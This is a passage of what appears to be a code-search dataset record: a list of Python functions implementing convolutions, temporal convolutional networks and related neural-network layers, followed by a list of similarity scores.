TimeDistributed(Activation('relu'))(x)\n return x", "def conv_to_fc_size(\n input_shape, conv_depth, pools,\n stride=[2, 2, 2], padding='SAME',\n dropout_keep_prob=1.0):\n h, w, d = input_shape\n if padding == 'SAME':\n for i in range(pools):\n h = math.ceil(float(h) / float(stride[0]))\n w = math.ceil(float(w) / float(stride[1]))\n d = math.ceil(float(d) / float(stride[2])) \n else:\n # 'VALID' padding\n pass\n \n return conv_depth * h * w * d", "def cortex_conv(inp, filters, n_out_w=None, n_out_h=None, \n strides=(1, 1, 1, 1), padding='SAME', bias=None):\n\n\n n_out = filters.get_shape()[3].value\n if n_out is None and (n_out_w is None or n_out_h is None):\n raise Exception(\"Filter shape not inferrable from filter tensor \"\n \"and output shape not inferrable from n_out_w and n_out_h.\")\n elif n_out is None:\n n_out = n_out_w * n_out_h\n\n if n_out_h is None:\n if n_out_w is None:\n sqrt = int(math.sqrt(n_out))\n n_out_w = sqrt\n n_out_h = n_out // n_out_w\n else:\n if n_out_w is None:\n n_out_w = n_out // n_out_h\n\n conv_raw = tf.nn.conv2d(inp, filters, strides=strides, padding=padding)\n if bias is not None:\n conv_raw = tf.nn.bias_add(conv_raw, bias)\n shp = [s.value for s in conv_raw.get_shape()]\n reshaped = tf.reshape(conv_raw[:, :, :, :n_out_w * n_out_h],\n (shp[0], shp[1], shp[2], n_out_h, n_out_w))\n transposed = tf.transpose(reshaped, (0, 1, 3, 2, 4))\n output = tf.reshape(transposed, (shp[0], shp[1] * n_out_h, shp[2] * n_out_w,\n 1))\n return output", "def __len__(self):\n num_x, num_y = self.conv_dims()\n return num_x * num_y", "def forward(self, inputs):\n # inputs is (batch, slen)\n x = self.embed(inputs) # x is (batch, seq, dim_e)\n x = x.transpose(1, 2) # x is (batch, dim_e, slen)\n # because conv1d requires (batch, channels_in=dim_e, slen)\n # to produce an output (batch, channels_out, slen - k + 1)\n # we then pool1d (kernel=slen-k) over the output of conv1d\n # since 1d works along time (i.e. sequence) this means\n # we get (batch, channels_out=cshannels_outs_k, 1) which we squeeze\n conv_blocks_out = [self.conv_blocks[n](x).squeeze(-1)\n for n in range(self.nk)]\n # and finally we concatenate all our conv1ds with different kernel\n # sizes together to get (batch, sum_k(channels_outs_k))\n # i.e. we concat the channels_out (i.e. featutres)\n x = torch.cat(conv_blocks_out, dim=1)\n\n # and do some dropout\n x = self.dropout(x)\n\n # squeeze into hidden\n if self.hidden_size > 0:\n x = self.fc(x)\n x = self.dropout2(x)\n x = self.fc_act(x)\n\n # map to classes and return\n x = self.output(x)\n return x", "def lac(X, conts, k, nsteps=30, window_size=1):\n dim = len(conts)\n\n #np.random.seed(42)\n # Initialize parameters\n priors = np.ones(k) / k\n\n\n import sys; sys.stdout.flush()\n if X is not None:\n means, covars = initialize_sample_kmeans(X, k)\n else:\n means, covars = initialize_random(conts, k)\n\n #means, covars = initialize_kmeans(conts, k)\n\n w = [np.empty((k, len(c[0]),)) for c in conts]\n\n\n for i in range(1, nsteps + 1):\n for l, (c, cw) in enumerate(conts):\n lower = l - window_size if l - window_size >= 0 else None\n upper = l + window_size + 1 if l + window_size + 1 <= dim else None\n dims = slice(lower, upper)\n active_dim = min(l, window_size)\n\n x = c\n\n # E step\n for j in range(k):\n if any(np.abs(covars[j, dims]) < 1e-15):\n assert False, 'covars should be fixed'\n\n det = covars[j, dims].prod()\n inv_covars = 1. 
/ covars[j, dims]\n xn = x - means[j, dims]\n factor = (2.0 * np.pi) ** (x.shape[1]/ 2.0) * det ** 0.5\n w[l][j] = priors[j] * np.exp(np.sum(xn * inv_covars * xn, axis=1) * -.5) / factor\n wsum = w[l].sum(axis=0)\n wsum[wsum == 0] = 1.\n w[l] /= wsum\n\n # M step\n n = np.sum(w[l], axis=1)\n priors = n / np.sum(n)\n for j in range(k):\n if n[j]:\n mu = np.dot(w[l][j, :] * cw, x[:, active_dim]) / (w[l][j, :] * cw).sum()\n\n xn = x[:, active_dim] - mu\n sigma = np.sum(xn ** 2 * w[l][j] * cw, axis=0) / (w[l][j, :] * cw).sum()\n sigma = sigma if sigma > 1e-3 else 1e-3\n\n if np.isnan(mu).any() or np.isnan(sigma).any():\n return w, means, covars, priors\n else:\n mu = means[j, l]\n sigma = MIN_COVARIANCE\n means[j, l] = mu\n covars[j, l] = sigma\n\n # w = np.zeros((k, m))\n # for j in range(k):\n # if active[j]:\n # det = covars[j].prod()\n # inv_covars = 1. / covars[j]\n # xn = X - means[j]\n # factor = (2.0 * np.pi) ** (xn.shape[1] / 2.0) * det ** 0.5\n # w[j] = priors[j] * exp(-.5 * np.sum(xn * inv_covars * xn, axis=1)) / factor\n # w[active] /= w[active].sum(axis=0)\n\n return w, means, covars, priors", "def TCN_V1(\n n_classes, \n feat_dim,\n max_len,\n gap=1,\n dropout=0.0,\n activation=\"relu\"):\n\n ROW_AXIS = 1\n CHANNEL_AXIS = 2\n \n initial_conv_len = 8\n initial_conv_num = 64\n\n config = [ \n [(1,8,64)],\n [(1,8,64)],\n [(1,8,64)],\n [(2,8,128)],\n [(1,8,128)],\n [(1,8,128)],\n [(2,8,256)],\n [(1,8,256)],\n [(1,8,256)],\n ]\n\n input = Input(shape=(max_len,feat_dim))\n model = input\n\n model = Convolution1D(initial_conv_num, \n initial_conv_len,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=1)(model)\n\n for depth in range(0,len(config)):\n blocks = []\n for stride,filter_dim,num in config[depth]:\n ## residual block\n bn = BatchNormalization(mode=0, axis=CHANNEL_AXIS)(model)\n relu = Activation(activation)(bn)\n dr = Dropout(dropout)(relu)\n conv = Convolution1D(num, \n filter_dim,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=stride)(dr)\n\n ## potential downsample\n conv_shape = K.int_shape(conv)\n model_shape = K.int_shape(model)\n if conv_shape[CHANNEL_AXIS] != model_shape[CHANNEL_AXIS]:\n model = Convolution1D(num, \n 1,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=2)(model)\n\n ## merge block\n model = merge([model,conv],mode='sum',concat_axis=CHANNEL_AXIS)\n\n ## final bn+relu\n bn = BatchNormalization(mode=0, axis=CHANNEL_AXIS)(model)\n model = Activation(activation)(bn)\n\n\n if gap:\n pool_window_shape = K.int_shape(model)\n gap = AveragePooling1D(pool_window_shape[ROW_AXIS],\n stride=1)(model)\n flatten = Flatten()(gap)\n else:\n flatten = Flatten()(model)\n\n dense = Dense(output_dim=n_classes,\n init=\"he_normal\",\n activation=\"softmax\")(flatten)\n\n model = Model(input=input, output=dense)\n # optimizer = SGD(lr=0.01, momentum=0.9, decay=0.0, nesterov=True) \n # model.compile(loss='categorical_crossentropy', optimizer=optimizer,metrics=['accuracy'])\n return model", "def convolve_im(im: np.array,\n kernel: np.array,\n verbose=True):\n\t\n ### START YOUR CODE HERE ### (You can change anything inside this block) \n\t\n H,W = np.shape(im)\n h,w = np.shape(kernel)\n t_b = (H-h)//2\n l_r = (W-w)//2\n kernel_padded = np.pad(kernel, ((t_b, t_b+1),(l_r, l_r+1)), 'constant')\n kernel_padded = np.pad(kernel, ((0, 2*t_b),(0, 2*l_r)), 'constant')\n fft_kernel = np.fft.fft2(kernel_padded, s=None, axes=(-2, -1), norm=None)\n \n \n im_fft = np.fft.fft2(im, s=None, axes=(-2, -1), norm=None) \n im_filt = im_fft*fft_kernel 
\n conv_result = np.fft.ifft2(im_filt, s=None, axes=(-2, -1), norm=None).real \n\n if verbose:\n # Use plt.subplot to place two or more images beside eachother\n plt.figure(figsize=(12, 4))\n # plt.subplot(num_rows, num_cols, position (1-indexed))\n plt.subplot(1, 2, 1)\n plt.imshow(im, cmap=\"gray\")\n plt.subplot(1, 2, 2) \n plt.imshow(conv_result, cmap=\"gray\")\n\n ### END YOUR CODE HERE ###\n return conv_result", "def __call__(self, x):\n x_shape = x.get_shape().as_list()\n batch_size = tf.shape(x)[0]\n stride_x, stride_y = self.stride[1], self.stride[2]\n output_shape = tf.stack([\n batch_size, x_shape[1] * stride_x, x_shape[2] * stride_y, self.nc_out])\n y = tf.nn.conv2d_transpose(\n x, filter=self._weight, output_shape=output_shape, strides=self.stride,\n padding=self.padding)\n return self._pre_scale * y + self._bias", "def one_hot_add_tf(inputs, shift):\n # Compute circular 1-D convolution with shift as the kernel.\n inputs = tf.cast(inputs, tf.complex64)\n shift = tf.cast(shift, tf.complex64)\n inputs_fft = tf.signal.fft(inputs)\n shift_fft = tf.signal.fft(shift)\n result_fft = inputs_fft * shift_fft\n return tf.math.real(tf.signal.ifft(result_fft)), result_fft, inputs_fft, shift_fft", "def test_conv2d():\n img = np.array([\n [0.3, 0.5, 0.7, 0.9],\n [0.1, 0.3, 0.5, 0.7],\n [0.9, 0.7, 0.5, 0.3],\n ])\n template = np.array([\n [1, 0],\n [1, 0],\n ])\n template = np.flipud(np.fliplr(template))\n return fftconvolve(img, template, mode='valid')", "def TCN_V3(\n n_classes, \n feat_dim,\n max_len,\n gap=1,\n dropout=0.0,\n activation=\"relu\"):\n\n ROW_AXIS = 1\n CHANNEL_AXIS = 2\n \n initial_conv_len = 8\n initial_conv_num = 128\n\n config = [ \n [(1,8,128)],\n [(1,8,128)],\n [(1,8,128)],\n [(2,8,256)],\n [(1,8,256)],\n [(1,8,256)],\n ]\n\n input = Input(shape=(max_len,feat_dim))\n model = input\n\n model = Convolution1D(initial_conv_num, \n initial_conv_len,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=1)(model)\n\n for depth in range(0,len(config)):\n blocks = []\n for stride,filter_dim,num in config[depth]:\n ## residual block\n bn = BatchNormalization(mode=0, axis=CHANNEL_AXIS)(model)\n relu = Activation(activation)(bn)\n dr = Dropout(dropout)(relu)\n conv = Convolution1D(num, \n filter_dim,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=stride)(dr)\n #dr = Dropout(dropout)(conv)\n\n\n ## potential downsample\n conv_shape = K.int_shape(conv)\n model_shape = K.int_shape(model)\n if conv_shape[CHANNEL_AXIS] != model_shape[CHANNEL_AXIS]:\n model = Convolution1D(num, \n 1,\n init=\"he_normal\",\n border_mode=\"same\",\n subsample_length=2)(model)\n\n ## merge block\n model = merge([model,conv],mode='sum',concat_axis=CHANNEL_AXIS)\n\n ## final bn+relu\n bn = BatchNormalization(mode=0, axis=CHANNEL_AXIS)(model)\n model = Activation(activation)(bn)\n\n\n if gap:\n pool_window_shape = K.int_shape(model)\n gap = AveragePooling1D(pool_window_shape[ROW_AXIS],\n stride=1)(model)\n flatten = Flatten()(gap)\n else:\n flatten = Flatten()(model)\n\n dense = Dense(output_dim=n_classes,\n init=\"he_normal\",\n activation=\"softmax\")(flatten)\n\n model = Model(input=input, output=dense)\n # optimizer = SGD(lr=0.01, momentum=0.9, decay=0.0, nesterov=True) \n # model.compile(loss='categorical_crossentropy', optimizer=optimizer,metrics=['accuracy'])\n return model", "def convolve_channels(images, kernel, padding='same', stride=(1, 1)):\n m, h, w, c = images.shape\n KernelHeight, kernelWidth, c = kernel.shape\n StrideHeight, StrideWidth = stride\n\n if padding == 
'valid':\n PaddingHeight = 0\n PaddingWidth = 0\n elif padding == 'same':\n PaddingHeight = int(\n (((h - 1) * StrideHeight + KernelHeight - h) / 2) + 1)\n PaddingWidth = int((((w - 1) * StrideWidth + kernelWidth - w) / 2) + 1)\n else:\n PaddingHeight, PaddingWidth = padding\n\n OutputH = int(((h + 2 * PaddingHeight - KernelHeight) / StrideHeight) + 1)\n OutputW = int(((w + 2 * PaddingWidth - kernelWidth) / StrideWidth) + 1)\n\n ImagePadded = np.pad(\n images,\n ((0, 0), (PaddingHeight, PaddingHeight),\n (PaddingWidth, PaddingWidth), (0, 0)),\n 'constant'\n )\n\n output = np.zeros((m, OutputH, OutputW))\n ImageRange = np.arange(m)\n\n for i_OutputH in range(OutputH):\n for i_OutputW in range(OutputW):\n s_i_OutputH = i_OutputH * StrideHeight\n s_i_OutputW = i_OutputW * StrideWidth\n flt = ImagePadded[ImageRange,\n s_i_OutputH:KernelHeight + s_i_OutputH,\n s_i_OutputW:kernelWidth + s_i_OutputW,\n :]\n output[ImageRange, i_OutputH, i_OutputW] = np.sum(\n flt * kernel, axis=(1, 2, 3))\n return output", "def convolution(x, kernel, padding, strides):\n # Temporarily combine the classes/batch dimensions while convolving.\n num_classes = x.shape[0].value\n batch_size = tf.shape(x)[1]\n x_squeezed = tf.reshape(x, shape=([num_classes * batch_size] +\n x.shape[2:].as_list()))\n if len(kernel.shape) == 4:\n y = tf.nn.convolution(x_squeezed, kernel, padding=padding, strides=strides)\n elif len(kernel.shape) == 3:\n y = tf.nn.conv1d(x_squeezed, kernel, padding=padding, stride=strides[0])\n else:\n raise ValueError()\n return tf.reshape(y, shape=([num_classes, batch_size] +\n y.shape[1:].as_list()))", "def convolve_channels(images, kernel, padding='same', stride=(1, 1)):\n m, image_h, image_w, image_c = images.shape\n kernel_h, kernel_w, kernel_c = kernel.shape\n stride_h, stride_w = stride\n\n if isinstance(padding, tuple):\n padding_h, padding_w = padding\n if padding is 'same':\n padding_h = int(((stride_h * image_h)\n - stride_h + kernel_h - image_h) / 2) + 1\n padding_w = int(((stride_w * image_w)\n - stride_w + kernel_w - image_w) / 2) + 1\n if padding is 'valid':\n padding_h, padding_w = 0, 0\n\n output_h = int(((image_h + (2 * padding_h) - kernel_h) / stride_h) + 1)\n output_w = int(((image_w + (2 * padding_w) - kernel_w) / stride_w) + 1)\n conv_output = np.zeros((m, output_h, output_w))\n\n img_m = np.arange(0, m)\n\n images = np.pad(\n images,\n [(0, 0), (padding_h, padding_h), (padding_w, padding_w), (0, 0)],\n mode='constant',\n constant_values=0)\n\n for i in range(output_h):\n for j in range(output_w):\n s_h = (stride_h)\n s_w = (stride_w)\n multiply = images[\n img_m,\n i*s_h:kernel_h+i*s_h,\n j*s_w:kernel_w+j*s_w]\n conv_output[img_m, i, j] = np.sum(\n np.multiply(multiply, kernel), axis=(1, 2, 3))\n return conv_output", "def _tucker_conv(x,\n filters,\n activation_fn=tf.nn.relu6,\n kernel_size=3,\n input_rank_ratio=0.25,\n output_rank_ratio=0.25,\n strides=1,\n residual=True,\n normalization_op_params=None):\n\n if normalization_op_params is None:\n raise ValueError('Normalization params cannot be `None`')\n\n _, height, width, channels = x.get_shape().as_list()\n shortcut = x\n input_rank = _scale_filters(channels, input_rank_ratio)\n\n x = _conv(x,\n input_rank,\n 1,\n activation_fn=activation_fn,\n normalization_op_params=normalization_op_params)\n output_rank = _scale_filters(filters, output_rank_ratio)\n x = _conv(x,\n output_rank,\n kernel_size,\n strides=strides,\n activation_fn=activation_fn,\n normalization_op_params=normalization_op_params)\n x = _conv(x,\n filters,\n 1,\n 
activation_fn=tf.identity,\n normalization_op_params=normalization_op_params)\n if residual:\n x = x + shortcut\n return x", "def deterministic_evolution_steps(c, a, K, t, dt, theta_c, c_cutoff,\r\n rate_function, prng=np.random, stochasticity='no'):\r\n # determine next intro event\r\n t_old = t\r\n t_delta = prng.exponential(1.0 / theta_c)\r\n\r\n while t < t_old + t_delta:\r\n # make time step fit next intro event time\r\n if t + dt > t_old + t_delta:\r\n thisdt = t_old + t_delta - t\r\n else:\r\n thisdt = dt\r\n\r\n # adapt rates\r\n birth_c, death_c = rate_function(c, a, K, t)\r\n\r\n # evolve clone sizes in the continuum approximation (deterministic)\r\n if stochasticity == 'linearized': # with birth-death-noise\r\n c += (birth_c - death_c) * c * thisdt + ((birth_c + death_c) * c * thisdt) ** .5 * prng.normal()\r\n else:\r\n c += (birth_c - death_c) * c * thisdt\r\n t += thisdt\r\n\r\n # clones / antigens lower than threshold are zeroed\r\n c[c < c_cutoff] = 0.0\r\n\r\n return c, t_old + t_delta", "def calc_cycle_count(self, time):\n dur = self.get_duration()\n phases = time / dur\n count = int(math.floor(phases))\n\n if not self.enable_loop():\n count = np.clip(count, 0, 1)\n\n return count", "def bottleneck(input_tensor, filters, strides, expansion_factor):\r\n ## part of Fast-SCNN\r\n _, input_height, input_width, input_channels = input_tensor.shape\r\n tensor = Conv2D(filters=input_channels * expansion_factor,\r\n kernel_size=1,\r\n strides=1,\r\n padding=\"same\",\r\n activation=\"relu\")(input_tensor)\r\n tensor = BatchNormalization()(tensor)\r\n tensor = Activation('relu')(tensor)\r\n\r\n tensor = DepthwiseConv2D(kernel_size=3,\r\n strides=strides,\r\n padding=\"same\")(tensor)\r\n tensor = BatchNormalization()(tensor)\r\n tensor = Activation('relu')(tensor)\r\n\r\n tensor = Conv2D(filters=filters,\r\n kernel_size=1,\r\n strides=1,\r\n padding=\"same\")(tensor)\r\n tensor = BatchNormalization()(tensor)\r\n output_tensor = Activation('relu')(tensor)\r\n return output_tensor", "def all_views_conv_layer(input_layer,network_type, layer_name, number_of_filters=32, filter_size=(3, 3), stride=(1, 1),\r\n padding='VALID', biases_initializer=tf.zeros_initializer()):\r\n if network_type == \"CC\":\r\n\r\n\r\n input_l_cc, input_r_cc = input_layer\r\n\r\n #with tf.variable_scope(layer_name + \"_CC\") as cc_cope:\r\n h_l_cc = tf.contrib.layers.convolution2d(inputs=input_l_cc, num_outputs=number_of_filters,\r\n kernel_size=filter_size, stride=stride, padding=padding,\r\n weights_initializer=tf.contrib.layers.xavier_initializer(), biases_initializer=biases_initializer)\r\n h_r_cc = tf.contrib.layers.convolution2d(inputs=input_r_cc, num_outputs=number_of_filters,\r\n kernel_size=filter_size, stride=stride, padding=padding, reuse=False,\r\n weights_initializer=tf.contrib.layers.xavier_initializer(), biases_initializer=biases_initializer)\r\n\r\n\r\n h = (h_l_cc, h_r_cc)\r\n\r\n return h\r\n\r\n else:\r\n input_l_mlo, input_r_mlo = input_layer\r\n\r\n # with tf.variable_scope(layer_name + \"_CC\") as cc_cope:\r\n h_l_mlo = tf.contrib.layers.convolution2d(inputs=input_l_mlo, num_outputs=number_of_filters,\r\n kernel_size=filter_size, stride=stride, padding=padding,\r\n weights_initializer=tf.contrib.layers.xavier_initializer(),\r\n biases_initializer=biases_initializer)\r\n h_r_mlo = tf.contrib.layers.convolution2d(inputs=input_r_mlo, num_outputs=number_of_filters,\r\n kernel_size=filter_size, stride=stride, padding=padding, reuse=False,\r\n 
weights_initializer=tf.contrib.layers.xavier_initializer(),\r\n biases_initializer=biases_initializer)\r\n\r\n h = (h_l_mlo, h_r_mlo)\r\n\r\n return h", "def conv2d(x, n_filters,\n n_in = 0,\n k_h=5, k_w=5,\n stride_h=2, stride_w=2,\n stddev=0.02,\n activation=lambda x: x,\n bias=False,\n padding='VALID',\n name=\"Conv2D\"):\n with tf.variable_scope(name):\n with tf.name_scope('weights'):\n if(n_in == 0):\n w = tf.get_variable(\n 'w', [k_h, k_w, x.get_shape()[-1], n_filters],\n initializer=tf.contrib.layers.xavier_initializer())\n else:\n w = tf.get_variable(\n 'w', [k_h, k_w, n_in, n_filters],\n initializer=tf.contrib.layers.xavier_initializer())\n variable_summaries(w, name + '/weights')\n with tf.name_scope('conv'): \n conv = tf.nn.conv2d(\n x, w, strides=[1, stride_h, stride_w, 1], padding=padding)\n if bias:\n with tf.name_scope('biases'):\n b = tf.get_variable(\n 'b', [n_filters],\n initializer=tf.contrib.layers.xavier_initializer())\n variable_summaries(b, name + '/bias')\n with tf.name_scope('conv'): \n conv = conv + b\n \n with tf.name_scope('conv'): \n tf.histogram_summary(name + '/conv', conv) \n return conv", "def _conv_block(inputs: \"Layer\",\n filters: int,\n kernel: int or Tuple[int, int],\n strides: int or Tuple[int, int]) -> \"Layer\":\n\n layer = Conv2D(filters, kernel, padding='same', strides=strides)(inputs)\n layer = BatchNormalization()(layer)\n layer = relu6(layer)\n return layer", "def integrated_time(x, c=5):\n if x.ndim != 1:\n raise ValueError(\"invalid shape\")\n\n f = autocorr_1d(x)\n taus = 2.0 * jnp.cumsum(f) - 1.0\n window = auto_window(taus, c)\n return taus[window]", "def forward(self, input):\n\n # Work on each channel separately\n all_features = []\n\n for channel in range(0, self.n_channels):\n input_channel = input[:, :, channel]\n\n # Add a dummy (spatial) dimension for the time convolutions\n # Conv1D format : (batch_size, n_feature_maps, duration)\n input_channel = input_channel.unsqueeze(1)\n\n high = self.all_conv_high[channel](input_channel)\n low = self.all_conv_low[channel](input_channel)\n ap_residual = self.all_residual[channel](input_channel)\n\n # Time convolutions are concatenated along the feature maps axis\n output_channel = torch.cat([\n high,\n low,\n ap_residual\n ], dim=1)\n all_features.append(output_channel)\n\n # Concatenate along the feature maps axis\n all_features = torch.cat(all_features, dim=1)\n\n # Flatten for the Linear layers\n all_features = all_features.view(-1,\n 9 * self.n_channels * 12) # <-- 12: depends of the initial sequence length (100).\n # If you have shorter/longer sequences, you probably do NOT even need to modify the modify the network architecture:\n # resampling your input gesture from T timesteps to 100 timesteps will (surprisingly) probably actually work as well!\n\n # Fully-Connected Layers\n output = self.fc(all_features)\n\n return output", "def forward(self, input):\n\n # Work on each channel separately\n all_features = []\n\n for channel in range(0, self.n_channels):\n input_channel = input[:, :, channel]\n\n # Add a dummy (spatial) dimension for the time convolutions\n # Conv1D format : (batch_size, n_feature_maps, duration)\n input_channel = input_channel.unsqueeze(1)\n\n high = self.all_conv_high[channel](input_channel)\n low = self.all_conv_low[channel](input_channel)\n ap_residual = self.all_residual[channel](input_channel)\n\n # Time convolutions are concatenated along the feature maps axis\n output_channel = torch.cat([\n high,\n low,\n ap_residual\n ], dim=1)\n 
all_features.append(output_channel)\n\n # Concatenate along the feature maps axis\n all_features = torch.cat(all_features, dim=1)\n # Flatten for the Linear layers\n all_features = all_features.view(-1,\n 9 * self.n_channels * 12) # <-- 12: depends of the initial sequence length (100).\n # If you have shorter/longer sequences, you probably do NOT even need to modify the modify the network architecture:\n # resampling your input gesture from T timesteps to 100 timesteps will (surprisingly) probably actually work as well!\n\n # Fully-Connected Layers\n output = self.fc(all_features)\n\n return output", "def concentration(self, time: float) -> _VectorisedFloat:\n concentration = self.concentration_model.concentration(time)\n for interaction in self.short_range:\n concentration += interaction.short_range_concentration(self.concentration_model, time)\n return concentration", "def tf_conv(x, kernel_size, n_features, stride = 1):\n # input shape\n x_shape = x.get_shape().as_list()\n assert(len(x_shape) == 4)\n x_features = x_shape[3]\n\n # weights and bias\n weight_shape = (kernel_size, kernel_size, x_features, n_features)\n weight_stddev = math.sqrt(2.0 / (kernel_size * kernel_size * n_features))\n weight = tf.Variable(\n tf.random_normal(weight_shape, mean = 0.0, stddev = weight_stddev))\n bias = tf.Variable(tf.zeros((n_features,)))\n\n # operation\n padding = \"SAME\"\n result = tf.nn.conv2d(\n x, weight,\n strides = (1, stride, stride, 1),\n padding = padding)\n result = tf.nn.bias_add(result, bias)\n return result", "def forward(self, x):\n if self.signal_length is None:\n self.signal_length = x.shape[-1]\n self.channels = x.shape[-2]\n self._scales = self.compute_optimal_scales()\n self._kernel = self._build_wavelet_bank()\n\n if self._kernel.is_complex():\n self._kernel_real = self._kernel.real\n self._kernel_imag = self._kernel.imag\n\n x = x.unsqueeze(1)\n\n if self._kernel.is_complex():\n if (\n x.dtype != self._kernel_real.dtype\n or x.device != self._kernel_real.device\n ):\n self._kernel_real = self._kernel_real.to(device=x.device, dtype=x.dtype)\n self._kernel_imag = self._kernel_imag.to(device=x.device, dtype=x.dtype)\n\n output_real = nn.functional.conv2d(\n x, self._kernel_real, padding=1, stride=self.stride\n )\n output_imag = nn.functional.conv2d(\n x, self._kernel_imag, padding=1, stride=self.stride\n )\n output_real = torch.transpose(output_real, 1, 2)\n output_imag = torch.transpose(output_imag, 1, 2)\n\n if self.output_format == \"Magnitude\":\n return torch.sqrt(output_real ** 2 + output_imag ** 2)\n else:\n return torch.stack([output_real, output_imag], -1)\n\n else:\n if x.device != self._kernel.device:\n self._kernel = self._kernel.to(device=x.device, dtype=x.dtype)\n\n output = nn.functional.conv2d(\n x, self._kernel, padding=1, stride=self.stride\n )\n return torch.transpose(output, 1, 2)", "def _conv_bn_layer(cnn_input, filters, kernel_size, strides, layer_id):\n output = tf.keras.layers.Conv2D(\n filters=filters, kernel_size=kernel_size, strides=strides, padding=\"same\",\n activation=\"linear\", name=\"cnn_{}\".format(layer_id))(cnn_input)\n output = tf.keras.layers.BatchNormalization(\n momentum=_MOMENTUM, epsilon=_EPSILON)(output)\n return output", "def Conv2D(\n inputs,\n filters,\n kernel_size,\n strides=(1, 1),\n padding='same',\n data_format='channels_last',\n dilation_rate=(1, 1),\n activation=None,\n use_bias=True,\n kernel_initializer=None,\n bias_initializer=tf.zeros_initializer(),\n kernel_regularizer=None,\n bias_regularizer=None,\n 
activity_regularizer=None,\n split=1):\n if kernel_initializer is None:\n if get_tf_version_tuple() <= (1, 12):\n kernel_initializer = tf.contrib.layers.variance_scaling_initializer(2.0)\n else:\n kernel_initializer = tf.keras.initializers.VarianceScaling(2.0, distribution='untruncated_normal')\n dilation_rate = shape2d(dilation_rate)\n\n if split == 1 and dilation_rate == [1, 1]:\n # tf.layers.Conv2D has bugs with dilations (https://github.com/tensorflow/tensorflow/issues/26797)\n with rename_get_variable({'kernel': 'W', 'bias': 'b'}):\n layer = tf.layers.Conv2D(\n filters,\n kernel_size,\n strides=strides,\n padding=padding,\n data_format=data_format,\n dilation_rate=dilation_rate,\n activation=activation,\n use_bias=use_bias,\n kernel_initializer=kernel_initializer,\n bias_initializer=bias_initializer,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n activity_regularizer=activity_regularizer,\n _reuse=tf.get_variable_scope().reuse)\n ret = layer.apply(inputs, scope=tf.get_variable_scope())\n ret = tf.identity(ret, name='output')\n\n ret.variables = VariableHolder(W=layer.kernel)\n if use_bias:\n ret.variables.b = layer.bias\n\n # compute the flops of the conv\n in_shape = inputs.get_shape().as_list()\n channel_axis = 3 if data_format == 'channels_last' else 1\n h_dim = 1 if data_format == 'channels_last' else 2\n w_dim = h_dim + 1\n in_channel = in_shape[channel_axis]\n out_channel = filters\n kernel_shape = shape2d(kernel_size)\n stride = shape4d(strides, data_format=data_format)\n flops = 1.0 * in_channel * out_channel * \\\n kernel_shape[0] * kernel_shape[1] / stride[h_dim] / stride[w_dim]\n if in_shape[h_dim] is not None and in_shape[h_dim] > 0:\n flops *= in_shape[h_dim] * in_shape[w_dim]\n ret.info = VariableHolder(flops=flops)\n\n else:\n # group conv implementation\n data_format = get_data_format(data_format, keras_mode=False)\n in_shape = inputs.get_shape().as_list()\n channel_axis = -1 if data_format == 'NHWC' else 1\n in_channel = in_shape[channel_axis]\n assert in_channel is not None, \"[Conv2D] Input cannot have unknown channel!\"\n assert in_channel % split == 0\n\n assert kernel_regularizer is None and bias_regularizer is None and activity_regularizer is None, \\\n \"Not supported by group conv now!\"\n\n out_channel = filters\n assert out_channel % split == 0\n assert dilation_rate == [1, 1] or get_tf_version_tuple() >= (1, 5), 'TF>=1.5 required for dilated conv.'\n\n kernel_shape = shape2d(kernel_size)\n filter_shape = kernel_shape + [in_channel / split, out_channel]\n stride = shape4d(strides, data_format=data_format)\n\n kwargs = dict(data_format=data_format)\n if get_tf_version_tuple() >= (1, 5):\n kwargs['dilations'] = shape4d(dilation_rate, data_format=data_format)\n\n W = tf.get_variable(\n 'W', filter_shape, initializer=kernel_initializer)\n\n if use_bias:\n b = tf.get_variable('b', [out_channel], initializer=bias_initializer)\n\n conv = None\n if get_tf_version_tuple() >= (1, 13):\n try:\n conv = tf.nn.conv2d(inputs, W, stride, padding.upper(), **kwargs)\n except ValueError:\n conv = None\n log_once(\"CUDNN group convolution support is only available with \"\n \"https://github.com/tensorflow/tensorflow/pull/25818 . 
\"\n \"Will fall back to a loop-based slow implementation instead!\", 'warn')\n if conv is None:\n inputs = tf.split(inputs, split, channel_axis)\n kernels = tf.split(W, split, 3)\n outputs = [tf.nn.conv2d(i, k, stride, padding.upper(), **kwargs)\n for i, k in zip(inputs, kernels)]\n conv = tf.concat(outputs, channel_axis)\n\n if activation is None:\n activation = tf.identity\n ret = activation(tf.nn.bias_add(conv, b, data_format=data_format) if use_bias else conv, name='output')\n\n ret.variables = VariableHolder(W=W)\n if use_bias:\n ret.variables.b = b\n\n h_dim = 1 if data_format == 'NHWC' else 2\n w_dim = h_dim + 1\n flops = 1.0 * in_channel * out_channel * \\\n kernel_shape[0] * kernel_shape[1] / stride[h_dim] / stride[w_dim] / split\n if in_shape[h_dim] is not None and in_shape[h_dim] > 0:\n flops *= in_shape[h_dim] * in_shape[w_dim]\n ret.info = VariableHolder(flops=flops)\n return ret" ]
[ "0.73321956", "0.72471476", "0.60040087", "0.58424336", "0.5774148", "0.57553667", "0.5680954", "0.56687814", "0.5620562", "0.55967027", "0.5519298", "0.5454149", "0.5431821", "0.5431813", "0.54018116", "0.5376901", "0.5364593", "0.5363788", "0.53633916", "0.52863103", "0.5259958", "0.5249676", "0.52386636", "0.5232303", "0.521968", "0.5171477", "0.5161529", "0.5161529", "0.5159964", "0.5159725", "0.5159037", "0.5154911", "0.5154691", "0.51447994", "0.5143702", "0.5135864", "0.5124968", "0.5117611", "0.5111951", "0.5106232", "0.5103339", "0.51033384", "0.50942653", "0.5092065", "0.50908875", "0.5088229", "0.50859565", "0.5078957", "0.5076036", "0.5075087", "0.5071101", "0.5066959", "0.5065676", "0.5061948", "0.50574183", "0.50355333", "0.50344276", "0.5031459", "0.5026389", "0.5014444", "0.50021064", "0.50020087", "0.49954537", "0.49939212", "0.49913174", "0.49861592", "0.49857292", "0.49851897", "0.49813953", "0.49784848", "0.4977237", "0.49690542", "0.49637905", "0.49489185", "0.49457997", "0.49337494", "0.49326307", "0.49324507", "0.49321154", "0.4928102", "0.49225676", "0.49142727", "0.4912051", "0.4911536", "0.49104917", "0.49064633", "0.4903294", "0.49032453", "0.49012288", "0.4899224", "0.4898819", "0.4892954", "0.48870248", "0.4885016", "0.48836285", 